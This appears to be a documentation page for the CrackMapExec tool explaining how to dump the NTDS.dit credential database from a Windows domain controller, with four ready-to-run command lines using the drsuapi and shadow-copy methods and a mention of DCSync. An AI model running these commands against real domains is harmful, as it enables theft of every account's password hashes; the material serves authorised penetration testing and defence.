Links
Comment on page

Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller
2 methods are available:
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
additional drsuapi calls to convert the resultant linked-lists into readable format
vss - Uses the Volume Shadow copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Last modified 2mo ago